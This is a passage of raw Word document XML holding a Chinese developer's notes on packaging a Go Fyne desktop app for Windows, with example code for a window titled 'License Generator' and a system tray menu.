          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fyne package -os windows -icon icon.ico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3FE42" w14:textId="7523063F" w:rsidR="003A66F1" w:rsidRPr="003A66F1" w:rsidRDefault="003A66F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果是直接</w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">go build </w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则会报错</w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>找不到，编写托盘的桌面程序必须用</w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r w:rsidRPr="003A66F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的指定打包方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1149C17E" w14:textId="77777777" w:rsidR="003A66F1" w:rsidRPr="003A66F1" w:rsidRDefault="003A66F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9FD0AF" w14:textId="77777777" w:rsidR="003A66F1" w:rsidRDefault="003A66F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B00F2B9" w14:textId="77777777" w:rsidR="009822CF" w:rsidRDefault="009822CF" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"fyne.io/fyne/v2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/app"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/container"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/driver/desktop"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"fyne.io/fyne/v2/widget"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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t xml:space="preserve">a := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>app</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>New</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t>w := a.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewWindow</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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"License Generator"</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t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetContent</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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>container</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewVBox</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>makeUI</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t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Resize</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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fyne</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewSize</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6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>200</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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>确认当前是桌面程序，则显示托盘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>desk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ok := a.(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ok {</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t xml:space="preserve">m := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewMenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"MyApp333"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Show"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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t>}))</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t>desk.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetSystemTrayMenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(m)</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t>}</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t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetCloseIntercept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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t>})</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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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t>a.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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r>
      <w:r>
        <w:rPr>
